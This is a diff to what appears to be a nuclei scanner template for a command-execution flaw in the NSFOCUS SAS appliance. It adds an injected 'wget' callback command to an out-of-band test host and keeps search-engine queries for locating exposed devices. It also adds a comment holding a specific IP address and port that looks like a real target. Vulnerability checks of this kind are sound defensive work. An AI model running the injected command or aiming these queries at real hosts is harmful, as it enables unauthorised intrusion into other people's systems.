--- a/domestic/nsfocus/nsfocus-sas-rce-exec.yaml
+++ b/domestic/nsfocus/nsfocus-sas-rce-exec.yaml
@@ -1,7 +1,7 @@
-id: Nsfocus-SAS-rce
+id: nsfocus-sas-rce-exec
 
 info:
-  name: Nsfocus-SAS-rce
+  name: nsfocus-sas-rce-exec
   author: hufei
   severity: critical
   description: |
@@ -13,7 +13,11 @@ info:
     fofa-query: title=="NSFOCUS&nbsp;SAS[H]"
     hunter-query: app.name="NSFOCUS 绿盟 SAS"
     verified: true
-  tags: 2023,HVV,Nsfocus-SAS,login-bypass
+  tags: 2023,HVV,nsfocus-sas,rce
+
+variables:
+  dns: "{{interactsh-url}}"
+  cmd: "wget {{dns}}"
 
 requests:
   - method: GET
@@ -25,3 +29,5 @@ requests:
         dsl:
           - contains(interactsh_protocol, "dns")
         condition: and
+
+# https://182.86.70.53:4433
